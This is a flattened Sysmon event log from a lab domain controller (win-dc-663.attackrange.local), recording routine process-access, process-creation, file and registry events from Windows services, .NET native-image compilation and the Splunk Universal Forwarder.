Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=824E816D346F3775C86749BF8AB3D05D,SHA256=15F002204801D7A1BFB023CE1E6665CF102242A4CF5828A3643D0981FBCC288D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018626Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.497{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A105-60D3-5202-00000000CF01}2680C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018625Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:00:53.497{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A105-60D3-5202-00000000CF01}2680C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018624Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.075{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A105-60D3-5102-00000000CF01}5332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018623Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:00:57.145{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018688Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:57.145{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018687Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:00:57.145{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018686Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:57.145{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018685Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:57.145{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A109-60D3-5A02-00000000CF01}6568C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018684Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:57.145{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A109-60D3-5A02-00000000CF01}6568C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000018683Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:57.146{4DB9351A-A109-60D3-5A02-00000000CF01}6568C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018712Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.582{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A10A-60D3-5D02-00000000CF01}4276C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018711Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.567{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A10A-60D3-5D02-00000000CF01}4276C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018710Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:00:58.567{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A10A-60D3-5D02-00000000CF01}4276C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000018709Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:00:58.442{4DB9351A-9DDD-60D3-1100-00000000CF01}436C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d76872-0xdd9e6a45) 10341000x800000000000000018708Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.270{4DB9351A-A10A-60D3-5B02-00000000CF01}30207028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018707Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.223{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A10A-60D3-5C02-00000000CF01}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018706Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.207{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A10A-60D3-5C02-00000000CF01}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018705Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:00:58.207{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A10A-60D3-5C02-00000000CF01}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018704Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.145{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4B10253114124B93D6A97F6404BEAC6E,SHA256=D440714C5AC223D64D664A3541FF542550244F6271D7AE33ACA7F62CEF860511,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000018703Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.114{4DB9351A-A108-60D3-5902-00000000CF01}3604NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\OH4V91O7SE\System.Deployment.ni.dll.auxMD5=04E371113A68F37EC6E50CDD89393E66,SHA256=23273344BBEC508C1A0FF721BD6F0B1C3EF922539B8C6111A0CD9D00BA0E94B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018702Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.114{4DB9351A-A108-60D3-5902-00000000CF01}3604NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\OH4V91O7SE\System.Deployment.ni.dllMD5=DD75C8F1ACEA1E0D27218C74B2B5BF44,SHA256=27C3D42E97041608FDF3A77B76C1A28A2A52D5AAE3807A64780C5622F7CF2BF4,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018701Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:00:58.067{4DB9351A-A108-60D3-5902-00000000CF01}3604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e14-0\System.Deployment.dll2021-06-23 21:00:58.067 10341000x800000000000000018700Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.053{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A10A-60D3-5B02-00000000CF01}3020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018699Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:00:58.053{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018698Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.053{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018697Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:00:58.053{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018696Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.053{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018695Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.053{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A10A-60D3-5B02-00000000CF01}3020C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018694Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.053{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A10A-60D3-5B02-00000000CF01}3020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000018693Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:58.054{4DB9351A-A10A-60D3-5B02-00000000CF01}3020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
